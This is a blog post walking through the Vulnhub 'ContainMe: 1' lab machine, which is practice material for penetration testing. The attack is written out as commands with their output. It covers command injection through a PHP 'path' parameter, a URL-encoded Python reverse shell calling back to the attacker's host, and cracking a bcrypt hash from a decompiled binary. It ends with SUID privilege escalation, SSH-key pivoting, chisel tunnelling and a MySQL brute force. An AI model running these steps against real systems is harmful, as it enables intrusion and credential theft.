Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub ContainMe: 1 Walkthrough

Vulnhub ContainMe: 1 Walkthrough

https://www.vulnhub.com/entry/containme-1,729/

Interesting machine. Need ELF analysis, multi-layer port forward, etc. Learned new things.


Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.142  -oN ports.log[[195/235]
 ...
 22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
 |_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
 80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
 |_http-server-header: Apache/2.4.29 (Ubuntu)
 |_http-title: Apache2 Ubuntu Default Page: It works
 2222/tcp open  EtherNetIP-1?
 |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
 8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
 |   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
 |_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80.

 ~ gobuster dir -u http://192.168.33.142 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /info.php             (Status: 200) [Size: 68948]
 /index.html           (Status: 200) [Size: 10918]
 /index.php            (Status: 200) [Size: 329]  


Check index.php, it will list files of current dir.

 ~ curl http://192.168.33.142/index.php
 <html>
 <body>
         <pre>
         total 28K
 drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
 drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
 -rw-r--r-- 1 root root  11K Jul 15 17:11 index.html
 -rw-r--r-- 1 root root  154 Jul 16 11:40 index.php
 -rw-r--r-- 1 root root   20 Jul 15 17:27 info.php
         <pre>
 
 <!--  where is the path ?  -->
 
 </body>
 </html>


Maybe index.php has LFI. Fuzz the param name.

 ~ wfuzz -u 'http://192.168.33.142/index.php?FUZZ=id'  --hh 329  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013516:   200        10 L     13 W       79 Ch       "path"    


It has code injection.

 ~ curl 'http://192.168.33.142/index.php?path=;id'                                                       ...
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 ...


Get reverse shell as www-data.

 ~ nc -nlvp 1234 
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.142.
 Ncat: Connection from 192.168.33.142:60146.
 bash: cannot set terminal process group (242): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@host1:/var/www/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@host1:/var/www/html$
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ curl 'http://192.168.33.142/index.php?path=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'


Now we have reverse shell of host1. In /home/mike, found interesting file named 1cryptupx.

 www-data@host1:/home/mike$ ls -la
 ls -la
 total 384
 drwxr-xr-x 5 mike mike   4096 Jul 30 04:36 .
 drwxr-xr-x 3 root root   4096 Jul 19 15:03 ..
 lrwxrwxrwx 1 root mike      9 Jul 19 15:06 .bash_history -> /dev/null
 -rw-r--r-- 1 mike mike    220 Apr  4  2018 .bash_logout
 -rw-r--r-- 1 mike mike   3771 Apr  4  2018 .bashrc
 drwx------ 2 mike mike   4096 Jul 30 04:36 .cache
 drwx------ 3 mike mike   4096 Jul 30 04:36 .gnupg
 -rw-r--r-- 1 mike mike    807 Apr  4  2018 .profile
 drwx------ 2 mike mike   4096 Jul 19 15:27 .ssh
 -rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx


Run 1cryptupx with any string param, showed decompress error.

 www-data@host1:/home/mike$ ./1cryptupx string
 ./1cryptupx string
 ░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
 ██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
 ██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
 ██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
 ╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
 ░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
 
 Unable to decompress.


We need to download 1cryptupx to local kali. Here I use xxd to display hex data of the file.

 curl 'http://192.168.33.142/index.php?path=;xxd%20-ps%20/home/mike/1cryptupx'
 ...
 0f7fb80039b93030919edc6e21ff1f407f40342f624343421f9e7f281839
 f2788f787f88ffec8617bba37f0090ff807fb9d845c1d87fac7fe04d143c
 39e0101a7fb292b393a1ffab9b7f680739f24226c468b268a2e1b8281808
 ffd27fd19edc6e1f807f70e098ff3b902f36d77f604b4e28ff2d76c145eb
 7f302f812d98867f277f0fa6db548103af977ff4ff9224098b00002a49ff
 000000005550582100000000555058210d1608096e14e678c6222cc76007
 000042020000d0a90d00491b00a2f4000000
         <pre>
 
 <!--  where is the path ?  -->
 
 </body>
 </html>


Then restore 1cryptupx  through cyberchef.

image-20210901141024237.png


Use upx to decompress.

 ~ upx -d -o dec 1cryptupx                                                                                                                                                                                               fish-0 | 0 [14:11:26]
                        Ultimate Packer for eXecutables
                           Copyright (C) 1996 - 2020
 UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
 
         File size         Ratio      Format      Name
    --------------------   ------   -----------   -----------
     895440 <-    358668   40.05%   linux/amd64   dec
 
 Unpacked 1 file.


Decompile the file in ghidra, found key string "Unable to decompress", locate the key function.

 undefined8 FUN_004016ad(int param_1,long param_2)
 
 {
   ...
   if (param_1 == 2) {
     uVar3 = *(undefined8 *)(param_2 + 8);
     uStack1056 = 0x401721;
     iVar1 = thunk_FUN_004010d6(uVar3,&DAT_004955cb);
     pcVar4 = "\nYou wish!";
     if (iVar1 != 0) {
       uStack1056 = 0x40173a;
       thunk_FUN_0040101e(auStack1048,uVar3);
       uStack1056 = 0x401742;
       lVar2 = thunk_FUN_004010d6(auStack1048);
       if (auStack1048[lVar2 + -1] == '\n') {
         auStack1048[lVar2 + -1] = 0;
       }
       uStack1056 = 0x40175d;
       uVar3 = FUN_00401d90(auStack1048,"$2b$15$TXl.yuAF49958vsn1dqPfe");
       uStack1056 = 0x40176c;
       iVar1 = thunk_FUN_004010d6(uVar3,
                                  "$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6");
       if (iVar1 == 0) {
         uStack1056 = 0x40177b;
         FUN_00453290(0,0,0);
         uStack1056 = 0x401787;
         FUN_0041ddc0("/bin/bash");
         return 0;
       }
       pcVar4 = "Unable to decompress.";
     }
     uStack1056 = 0x401795;
     FUN_0041eaa0(pcVar4);
   }
   return 0;
 }


In this function, we get an hash string. It means if we input the correct password, the function will call "/bin/bash" as root.

We save the hash string into hash.txt.

 ~ echo '$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6' > hash.txt


Use john to brute force the hash.

 ~ john --wordlist=/usr/share/wordlists/seclists/Passwords/Common-Credentials/10k-most-common.txt  hash.txt                                                                                      vim-0 | 0 [20:32:26]
 Using default input encoding: UTF-8
 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
 Cost 1 (iteration count) is 32768 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 mike             (?)
 1g 0:00:02:03 DONE (2021-08-31 20:36) 0.008120g/s 1.461p/s 1.461c/s 1.461C/s internet..john
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed


Now we get the password of the file.

Search files with SUID.

 www-data@host1:/home/mike$ find / -perm -u=s 2>/dev/null
 find / -perm -u=s 2>/dev/null
 /usr/share/man/zh_TW/crypt
 /usr/bin/newuidmap
 /usr/bin/newgidmap
 ...


Notice the first file, run crypt with password, we get root on host1.

 www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt mike
 /usr/share/man/zh_TW/crypt mike
 ░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
 ██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
 ██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
 ██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
 ╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
 ░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
 root@host1:/home/mike# id
 uid=0(root) gid=33(www-data) groups=33(www-data)


Check local ips, notice an interesting IP in another network range.

 root@host1:/home/mike# ifconfig
 ...
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 172.16.20.2  netmask 255.255.255.0  broadcast 172.16.20.255
         inet6 fe80::216:3eff:fe46:6b29  prefixlen 64  scopeid 0x20<link>
 ...


Scan for live hosts on this ip range with bash command, found live host 172.16.20.6.

 root@host1:~# for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5  >/dev/null && echo "172.16.20.$i" &) ;done
 172.16.20.2
 172.16.20.6


Scan for open ports of host2.

 for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open
 ...
 port 22 is open


Here is a little tricky. We can login host2 with user name mike and id_rsa of mike on host1.

 root@host1:/# cd /home/mike/.ssh/
 root@host1:/home/mike/.ssh# ssh mike@172.16.20.6 -i id_rsa
 
 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.
 
 Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
 mike@host2:~$


Check local ports of host2, mysql is running.

 mike@host2:/home$ ss -ntlp
 State               Recv-Q               Send-Q                              Local Address:Port                              Peer Address:Port              
 LISTEN              0                    80                                      127.0.0.1:3306                                   0.0.0.0:*                  
 LISTEN              0                    128                                 127.0.0.53%lo:53                                     0.0.0.0:*                  
 LISTEN              0                    128                                       0.0.0.0:22                                     0.0.0.0:*                  
 LISTEN              0                    128                                          [::]:22                                        [::]:*


We need to port forward 3306 outside, in order to brute force it.

First, on host1, we use ssh -L to map host2:3306 ==> host1:3306.

 root@host1:/home/mike/.ssh# ssh -g -L 3306:127.0.0.1:3306 mike@172.16.20.6 -i id_rsa


Check ports of host1, 3306 is open.

 root@host1:~# ss -ntlp
 State   Recv-Q   Send-Q      Local Address:Port      Peer Address:Port                                                                            
 LISTEN  0        128         127.0.0.53%lo:53             0.0.0.0:*       users:(("systemd-resolve",pid=138,fd=13))                              
 LISTEN  0        128               0.0.0.0:22             0.0.0.0:*       users:(("sshd",pid=199,fd=3))                                          
 LISTEN  0        128             127.0.0.1:3306           0.0.0.0:*       users:(("ssh",pid=1870,fd=5))                                          
 LISTEN  0        128                     *:80                   *:*       users:(("apache2",pid=613,fd=4),("apache2",pid=602,fd=4),("apache2",pid=592,fd=4),("apache2",pid=457,fd=4),("apache2",pid=375,fd=4),("apache2",pid=270,fd=4),("apache2",pid=269,fd=4),("apache2",pid=268,fd=4),("apache2",pid=257,fd=4))
 LISTEN  0        128                  [::]:22                [::]:*       users:(("sshd",pid=199,fd=4))                                          
 LISTEN  0        128                 [::1]:3306              [::]:*       users:(("ssh",pid=1870,fd=4))  


Then we need to map host1:3306 outside to kali, but host1 has limits, so ssh and socat all don't work. We have to use chisel.

On kali, run chisel server.

 ~ ./chisel server -p 8080 --reverse  
 2021/09/01 13:26:59 server: Reverse tunnelling enabled
 2021/09/01 13:26:59 server: Fingerprint QJGGHnimzCp6x3qmFZtvSyGo1ycXNZT7o9iyG537DF8=
 2021/09/01 13:26:59 server: Listening on http://0.0.0.0:8080


Then on host1, run chisel client.

 root@host1:~# ./chisel client http://192.168.33.128:33060 R:3306:127.0.0.1:33060


Now check port of kali, port 3306 is open.

The path is: kali:3306 ==> host1:3306 ==> host2:3306.

 ~ ss -ntlp                                                                                                                                                           
 State                    Recv-Q                   Send-Q                                     Local Address:Port                                     Peer Address:Port
 LISTEN                   0                        50                                             127.0.0.1:9614                                          0.0.0.0:*  
 LISTEN                   0                        511                                            127.0.0.1:6463                                          0.0.0.0:*  
 LISTEN                   0                        4096                                                   *:3306                                                *:*  
 LISTEN                   0                        4096                                                   *:8080                                                *:*  
 


Use medusa to bruteforce password of mysql on kali.

 ~ medusa  -h 127.0.0.1 -M mysql -u mike -P /usr/share/wordlists/rock_ascii.txt -t 50 
 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
 ...
 ACCOUNT FOUND: [mysql] Host: 127.0.0.1 User: mike Password: password [SUCCESS]
 ...


Next on host2, login mysql, get password of root.

 mysql> select * from users;
 +-------+---------------------+
 | login | password            |
 +-------+---------------------+
 | root  | bjsig4868fgjjeog    |
 | mike  | WhatAreYouDoingHere |
 +-------+---------------------+
 2 rows in set (0.00 sec)


Su to root on host2. Found mike.zip in /root.

 root@host2:~# ls -la
 total 28
 drwx------  4 root root 4096 Jul 19 20:35 .
 drwxr-xr-x 22 root root 4096 Jun 29 08:07 ..
 lrwxrwxrwx  1 root root    9 Jul 19 20:32 .bash_history -> /dev/null
 -rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
 drwxr-xr-x  3 root root 4096 Jul 15 14:47 .local
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 drwx------  2 root root 4096 Jul 15 14:41 .ssh
 -rw-------  1 root root  218 Jul 16 02:26 mike.zip


Unzip mike.zip with password from database. Get final flag.

 oot@host2:~# unzip mike.zip 
 Archive:  mike.zip
 [mike.zip] mike password:
  extracting: mike                    
 root@host2:~# cat mike
 THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
 root@host2:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 host2


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0